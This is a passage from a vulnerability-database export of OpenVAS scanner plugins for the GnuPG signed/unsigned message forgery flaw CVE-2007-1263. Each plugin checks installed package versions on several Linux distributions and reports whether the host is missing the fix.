affect\nthe security of your system. One or more of the following packages\nare affected:\n\n gpg\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020588 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65441);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-1263\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for gpg\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-06T11:40:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n gpg\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020588 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065441", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065441", "type": "openvas", "title": "SLES9: Security update for gpg", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020588.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for gpg\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n gpg\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020588 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65441\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-1263\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for gpg\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-09T11:40:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "Check for the Version of gnupg", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830318", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830318", "type": "openvas", "title": "Mandriva Update for gnupg MDKSA-2007:059 (gnupg)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for gnupg MDKSA-2007:059 (gnupg)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"GnuPG prior to 1.4.7 and GPGME prior to 1.1.4, when run from the\n command\n line, did not visually distinguish signed and unsigned portions of\n OpenPGP messages with multiple components. This could allow a remote\n attacker to forge the contents of an email message without detection.\n\n GnuPG 1.4.7 is being provided with this update and GPGME has been\n patched on Mandriva 2007.0 to provide better visual notification on\n these types of forgeries.\";\n\ntag_affected = \"gnupg on Mandriva Linux 2006.0,\n Mandriva Linux 2006.0/X86_64,\n Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-03/msg00011.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830318\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:059\");\n script_cve_id(\"CVE-2007-1263\");\n script_name( \"Mandriva Update for gnupg MDKSA-2007:059 (gnupg)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of gnupg\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnupg\", rpm:\"gnupg~1.4.7~0.2mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgpgme11\", rpm:\"libgpgme11~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgpgme11-devel\", rpm:\"libgpgme11-devel~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpgme\", rpm:\"gpgme~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64gpgme11\", rpm:\"lib64gpgme11~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64gpgme11-devel\", rpm:\"lib64gpgme11-devel~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2006.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnupg\", rpm:\"gnupg~1.4.7~0.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "The remote host is missing an update to gnupg\nannounced via advisory DSA 1266-1.\n\nGerardo Richarte discovered that GnuPG, a free PGP replacement, provides\ninsufficient user feedback if an OpenPGP message contains both unsigned\nand signed portions. Inserting text segments into an otherwise signed\nmessage could be exploited to forge the content of signed messages.\nThis update prevents such attacks; the old behaviour can still be\nactivated by passing the --allow-multiple-messages option.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:58121", "href": "http://plugins.openvas.org/nasl.php?oid=58121", "type": "openvas", "title": "Debian Security Advisory DSA 1266-1 (gnupg)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1266_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1266-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 1.4.1-1.sarge7.\n\nFor the upcoming stable distribution (etch) these problems have been\nfixed in version 1.4.6-2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.4.6-2.\n\nWe recommend that you upgrade your gnupg packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201266-1\";\ntag_summary = \"The remote host is missing an update to gnupg\nannounced via advisory DSA 1266-1.\n\nGerardo Richarte discovered that GnuPG, a free PGP replacement, provides\ninsufficient user feedback if an OpenPGP message contains both unsigned\nand signed portions. Inserting text segments into an otherwise signed\nmessage could be exploited to forge the content of signed messages.\nThis update prevents such attacks; the old behaviour can still be\nactivated by passing the --allow-multiple-messages option.\";\n\n\nif(description)\n{\n script_id(58121);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-1263\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Debian Security Advisory DSA 1266-1 (gnupg)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gnupg\", ver:\"1.4.1-1.sarge7\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-04T11:28:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-432-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840050", "href": "http://plugins.openvas.org/nasl.php?oid=840050", "type": "openvas", "title": "Ubuntu Update for gnupg vulnerability USN-432-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_432_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for gnupg vulnerability USN-432-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Gerardo Richarte from Core Security Technologies discovered that when\n gnupg is used without --status-fd, there is no way to distinguish\n initial unsigned messages from a following signed message. An attacker\n could inject an unsigned message, which could fool the user into\n thinking the message was entirely signed by the original sender.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-432-1\";\ntag_affected = \"gnupg vulnerability on Ubuntu 5.10 ,\n Ubuntu 6.06 LTS ,\n Ubuntu 6.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-432-1/\");\n script_id(840050);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:55:18 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"USN\", value: \"432-1\");\n script_cve_id(\"CVE-2007-1263\");\n script_name( \"Ubuntu Update for gnupg vulnerability USN-432-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"gnupg\", ver:\"1.4.2.2-1ubuntu2.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"gnupg\", ver:\"1.4.3-2ubuntu3.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU5.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"gnupg\", ver:\"1.4.1-1ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-04T11:28:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-432-2", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840054", "href": "http://plugins.openvas.org/nasl.php?oid=840054", "type": "openvas", "title": "Ubuntu Update for gnupg2, gpgme1.0 vulnerability USN-432-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_432_2.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for gnupg2, gpgme1.0 vulnerability USN-432-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-432-1 fixed a vulnerability in GnuPG. This update provides the\n corresponding updates for GnuPG2 and the GPGME library.\n\n Original advisory details:\n \n Gerardo Richarte from Core Security Technologies discovered that when\n gnupg is used without --status-fd, there is no way to distinguish\n initial unsigned messages from a following signed message. An attacker\n could inject an unsigned message, which could fool the user into\n thinking the message was entirely signed by the original sender.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-432-2\";\ntag_affected = \"gnupg2, gpgme1.0 vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 6.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-432-2/\");\n script_id(840054);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:55:18 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"USN\", value: \"432-2\");\n script_cve_id(\"CVE-2007-1263\");\n script_name( \"Ubuntu Update for gnupg2, gpgme1.0 vulnerability USN-432-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgpgme11-dev\", ver:\"1.1.0-1ubuntu0.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgpgme11\", ver:\"1.1.0-1ubuntu0.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"gnupg-agent\", ver:\"1.9.21-0ubuntu5.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gnupg2\", ver:\"1.9.21-0ubuntu5.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gpgsm\", ver:\"1.9.21-0ubuntu5.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgpgme11-dev\", ver:\"1.1.2-2ubuntu0.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgpgme11\", ver:\"1.1.2-2ubuntu0.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2007-066-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:58131", "href": "http://plugins.openvas.org/nasl.php?oid=58131", "type": "openvas", "title": "Slackware Advisory SSA:2007-066-01 gnupg", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2007_066_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New gnupg packages are available for Slackware 9.0, 9.1, 10.0, 10.1, 10.2,\nand 11.0 to fix security ramifications of incorrect gpg usage.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2007-066-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2007-066-01\";\n \nif(description)\n{\n script_id(58131);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2007-1263\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2007-066-01 gnupg \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2007-066-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231058131", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231058131", "type": "openvas", "title": "Slackware Advisory SSA:2007-066-01 gnupg", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2007_066_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 